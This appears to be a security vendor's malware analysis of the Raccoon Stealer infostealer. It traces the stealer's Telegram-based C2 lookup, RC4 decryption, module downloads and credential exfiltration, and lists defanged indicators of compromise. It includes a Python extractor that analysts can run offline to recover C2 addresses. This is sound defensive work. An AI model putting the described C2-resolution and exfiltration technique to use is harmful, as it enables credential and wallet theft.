
Raccoon Stealer: The ‘Malware-as-a-Service’ (MaaS) Information Stealer’s Current Surge


Raccoon Stealer is an information stealer that, as its name suggests, steals user credentials and data stored in web browsers, mail applications, cryptocurrency wallets and Discord files.

Non-technical Summary

Raccoon Stealer goes after user-specific data stored in the most commonly used web browsers. This includes cookies and all user credentials (login IDs and passwords) saved in browsers, as well as cryptocurrency wallets. The malware is usually delivered through a macro-laden document attached to spam mail. When the macro runs, it installs the malware. Communication is then established with a specified malicious website; the malware collects data from the infected system and sends it to that website.

About the Threat

Raccoon Stealer was first observed in 2019 and is believed to originate in Russia. Openly advertised as a ‘Malware-as-a-Service’ (MaaS) on the dark web, it is well known in cybercriminal circles. It is also one of the most well-administered and well-managed malware services.

Right from the different usage plans / subscriptions offered for sale, to its ‘customer’ service practices, it is efficiently managed as a well-run commercial venture. Its creators regularly update its features, offer trial periods and add-on services to the main infostealer. Each unit sold has a unique signature that can be traced and tracked by the creators.

This malware is initially dropped via an email, through a macro in an attached document. Sometimes the threat actor uses another malware to deliver the payload. In some cases, it is also delivered when a victim downloads a cracked version of software from dubious sources.

Security Analysts at SecneurX have observed a surge in Raccoon Stealer in the wild in the last 3 months. It was very active during October – December 2021, as shown in the chart below. Over 1500 Raccoon Stealer samples were collected and analyzed during this period.

Chart 1: Surge in Raccoon Malware activity observed in SecneurX Research Lab


A notable observation during this surge is that Raccoon Stealer is delivered as a payload by other malware already present on the system. In the case of the sample described in this blog, the Raccoon Stealer executable was dropped by other malware that had already infiltrated the system. This sample of Raccoon Stealer communicates with a Telegram profile to acquire the Command and Control (C2) URL, which is in the form of an IP address.

The payload is then installed in a series of steps. All communication to and from the infected system is encrypted. Once fully installed, the malware collects its target data and exfiltrates it to the C2.

The information that Raccoon Stealer gathers and exfiltrates includes:

System information of the affected system

Auto-fill credentials stored in web-browsers

Cryptocurrency wallets

Cookies

Web browser history

On completion of its objective, the malware comes with the option of auto-deleting itself and eliminating all traces of its actions.

SecneurX's Analysis of the Modus Operandi

Security Analysts at SecneurX studied the artifact with the following SHA256 hash:

312f192e3506150ed6b6985f0c633708eca2cb1964d189a6fc1a05e096af415d

This is a .exe sample of the malware and is usually dropped from an infected document when the macros are enabled. Once run, the following actions take place.

Step 1: Acquire C2 Address

Once executed, the dropped .exe file first issues the following request: [ GET ] hxxp://telegalive[.]top/jdiamond13

In this request, hxxp://telegalive[.]top is the C2 and jdiamond13 is the Telegram user ID.

The response to the above request is shown in Figure 1 below.

Figure 1: Response from C2


The malicious domain, created by the malware authors, returns the Telegram profile page for the user ID in the URL (as shown in Figure 2 below). Raccoon Stealer then copies the value of the ‘content’ field highlighted in Figure 1, "e2559fV46cjQG7j8UeXHTRGF49yaP1BIuc0-v54", from the Telegram page. It then trims a few characters from this value to get the actual data, "fV46cjQG7j8UeXHTRGF49yaP1BIuc". This is an RC4-encrypted C2 address.

Figure 2: Recreating the response and the encrypted C2 address in Telegram profile page


The malware then decrypts the above string using an embedded hardcoded key. This reveals the C2 URL, hxxp://91[.]219[.]236[.]49/, as shown in Figure 3 below.

Figure 3: Decoding the encrypted C2 address

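The Step 1 retrieval chain (fetch the Telegram profile page, take the ‘content’ field, trim the marker, RC4-decrypt with the sample's embedded key) is the kind of logic an analyst reproduces to recover the C2 from a captured page. The following is an added example written for this post, not code from the malware or from SecneurX; it assumes the ‘content’ field is the og:description meta tag, that the trimmed marker is base64-encoded before RC4, and uses a constructed key, URL and HTML page rather than values from the real sample.

```python
import base64
import re

def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 keystream XOR; the same call both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

# Assumption: the 'content' field is the og:description meta tag of the profile page.
META_RE = re.compile(r'<meta\s+property="og:description"\s+content="([^"]*)"')

def extract_content_field(html: str) -> str:
    m = META_RE.search(html)
    if not m:
        raise ValueError("no og:description meta tag found in profile page")
    return m.group(1)

def trim_marker(value: str, head: int = 5, tail: int = 5) -> str:
    # The post's values ("e2559...0-v54" -> "fV46...BIuc") drop 5 chars on each side.
    if len(value) <= head + tail:
        raise ValueError("marker too short to trim")
    return value[head:-tail]

def recover_c2(html: str, key: bytes) -> str:
    marker = trim_marker(extract_content_field(html))
    plain = rc4(key, base64.b64decode(marker))   # base64 layer is an assumption
    if not plain.startswith(b"http"):
        raise ValueError("decrypted data is not a URL: wrong key or encoding")
    return plain.decode("ascii")

# Constructed demo inputs (not the sample's real key, C2 or page).
SAMPLE_KEY = b"constructed-demo-key"
SAMPLE_C2 = "http://c2.example.invalid/"
_marker = "e2559" + base64.b64encode(rc4(SAMPLE_KEY, SAMPLE_C2.encode())).decode() + "0-v54"
SAMPLE_HTML = f'<html><head><meta property="og:description" content="{_marker}"></head></html>'

if __name__ == "__main__":
    print(recover_c2(SAMPLE_HTML, SAMPLE_KEY))
```

Against a real sample, the key comes from the unpacked binary and the HTML from a saved copy of the profile page, so the extractor can run offline without contacting any infrastructure.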

Step 2: Communication with C2 and download of configuration data

Using the retrieved IP address, the malware connects to the C2 to post the unique victim ID and download the configuration data.

[ POST ] hxxp://91[.]219[.]236[.]49/

Figure 4: Communication with the C2


The encrypted unique victim ID is decrypted as shown in Figure 5.

Figure 5: Decoding the Communication with the C2


Figure 6: Decoding the Communication with the C2


Step 3: Download of Data Extraction Modules

It then downloads the data extraction module and additional dependency modules through the following requests:

[ GET ] hxxp://91[.]219[.]236[.]49//l/f/x52vxXwB3dP17SpzzQGD/f66df01ec20c0cf373071d4d6494de1445530c2e

[ GET ] hxxp://91[.]219[.]236[.]49//l/f/x52vxXwB3dP17SpzzQGD/1f8a5bbeae4cfc7c9cb8071759d16e938f15d0d0

Figure 7: Downloading Modules for Data Extraction


Figure 8: Downloading additional modules in zip


Figure 9: Content of the Zip file


Step 4: Data Exfiltration

Once the victim’s credentials are extracted, the malware creates a Zip file and stores the information there. This file is then sent to the threat actor’s C2.

Figure 10: Data Exfiltration


Figure 11: Contents of the Zip file


Indicators of Compromise

IP Addresses
91[.]219[.]236[.]49
URLs
hxxp[:]//91[.]219[.]236[.]49/

Telegram profile IOCs managed by the threat actor: agrybirdsgamerept, ararius809b, baldandbankrupt1, baudemars, bern33ster, bghost13, bimboDinotrex, brikitiki, capibar, ch0koalpengold, dodgeneontwinturbo, duglassa1, elonstack12, erndxesto, frombobu98s, fsp1boomgasio, h_electricryptors2, h_ghaibin2_1, hapikmalabar, hbackwoods1, hdmiprapor, hellobyegain, hiioBlacklight1, hoverpattern31, indosgigabitbet, iolitena111, jabbahatt121, jagressor_kz, jamesonkamerun, jdiamond13, jiiDante, johnyes13